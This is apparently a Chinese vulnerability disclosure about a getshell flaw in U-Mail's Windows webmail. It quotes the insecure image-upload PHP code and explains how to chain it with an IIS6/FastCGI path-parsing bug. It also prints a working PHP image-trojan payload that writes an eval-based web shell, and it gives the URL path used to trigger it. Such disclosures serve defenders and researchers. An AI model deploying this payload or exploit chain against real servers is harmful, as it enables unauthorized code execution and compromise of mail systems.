### 简要描述:
U-Mail邮件系统windows版本存在缺陷,导致普通用户getshell
### 详细说明:
环境说明:官网下载windows版最新版,windows server 2003+IIS6搭建、登录邮箱测试时候使用最新版chrome浏览器,需要普通用户登录
漏洞文件:
C:\umail\WorldClient\html\client\option\module\o_letterpaper.php
代码:
```
if ( ACTION == "letterpaper-img-upload" )
{
$targetFolder = getusercachepath( );
$verifyToken = md5( "unique_salt".$_POST['timestamp'] );
if ( !empty( $_FILES ) || $_POST['token'] == $verifyToken )
{
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $targetFolder;
$targetFile = rtrim( $targetPath, "/" )."/letterpaper_".$_FILES['Filedata']['name'];
$fileTypes = array( "jpg", "jpeg", "gif", "png" );
$fileParts = pathinfo( $_FILES['Filedata']['name'] );
if ( in_array( $fileParts['extension'], $fileTypes ) )
{
$handle = opendir( $targetPath );
while ( ( $file = readdir( $handle ) ) !== FALSE )
{
if ( !( $file != "." ) && !( $file != ".." ) && strpos( $file, "letterpaper_" ) === FALSE )
{
$dir = rtrim( $targetPath, "/" ).DIRECTORY_SEPARATOR.$file;
unlink( $dir );
}
}
closedir( $handle );
if ( move_uploaded_file( $tempFile, $targetFile ) )
{
$thumbFile = rtrim( $targetPath, "/" )."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension'];
$thumbUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$fileParts['filename']."_thumb.".$fileParts['extension'];
$targetUrl = rtrim( WEBMAIL_URL, "/" )."/cache/".$user_id."/letterpaper_".$_FILES['Filedata']['name'];
if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) )
{
dump_json( array(
"status" => 1,
"file" => $targetFile,
"fileUrl" => $targetUrl,
"thumb" => $thumbFile,
"thumbUrl" => $thumbUrl
) );
}
else
{
unlink( $targetFile );
exit( );
}
}
}
else
{
dump_json( array( "status" => 0, "msg" => "Invalid file type." ) );
}
}
}
```
此处为信纸的上传图片的页面,只允许jpg等图片格式的上传,由于是windows版的,可以结合iis6.0的解析漏洞,但上传成功a.php;a.jpg时候会提示错误,脚本执行错误500。然后此php是以fastcgi形式跑的,因而利用v.jpg/a.php解析漏洞。此默认安装包的php版本为
[<img src="https://images.seebug.org/upload/201405/1618505037818a71917c121c3e782bf5e8f4ca52.png" alt="d5d1e8a2-1150-47f6-a1c2-33a076b14409.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1618505037818a71917c121c3e782bf5e8f4ca52.png)
漏洞利用过程
准备图片木马,必须是图片,然后里面需嵌入php代码为
<?php @fwrite(fopen(base64_decode('ZnVjay5waHA='),w), base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydmdWNrJ10pOz8+'));
注意不要闭合,会报错。代码执行后会在当前目录下生成fuck.php的一句话木马
此处的图片木马为
[<img src="https://images.seebug.org/upload/201405/161851365da85b5aaa472acf4075f022851fe663.jpg" alt="ddd.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161851365da85b5aaa472acf4075f022851fe663.jpg)
若不是图片木马,则在执行函数的
if ( img2thumb( $targetFile, $thumbFile, $width = 100, $height = 100, $cut = 1, $proportion = 0 ) )
会出错,查看到的相应内容里不会有上传后的地址,如图
[<img src="https://images.seebug.org/upload/201405/1618521634479267f85d9c167f8ec6ebf64b7d72.png" alt="abfe8804-34c4-4705-8ecf-df0a7f3d2e87.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1618521634479267f85d9c167f8ec6ebf64b7d72.png)
chrome浏览登录邮箱后,设置代理
[<img src="https://images.seebug.org/upload/201405/16185256a2d2c24943561902f768f938b5b7881c.png" alt="a4c5dae0-0077-4668-8d5a-a60beb2633f5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16185256a2d2c24943561902f768f938b5b7881c.png)
查看响应
[<img src="https://images.seebug.org/upload/201405/161853348e42c5326241a26dc8ae3c9a656c592e.png" alt="dd.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161853348e42c5326241a26dc8ae3c9a656c592e.png)
获得的上传后地址为,
/webmail/client/cache/5/letterpaper_v.jpg
ok,浏览器访问//webmail/client/cache/5/letterpaper_v.jpg/a.php
[<img src="https://images.seebug.org/upload/201405/1618540971e3bd0b39ed67cce2f3f561c1296b57.png" alt="bb.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1618540971e3bd0b39ed67cce2f3f561c1296b57.png)
官网未提供设置信纸功能,但同样可以本地提交,修改post地址获取webshell,未具体测试
官网是有解析漏洞的,如下
[<img src="https://images.seebug.org/upload/201405/161854522fa128e8087eb14cd907e7d619959a21.png" alt="dw.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/161854522fa128e8087eb14cd907e7d619959a21.png)
### 漏洞证明:
如上详细描述
京公网安备 11010502034610号
暂无评论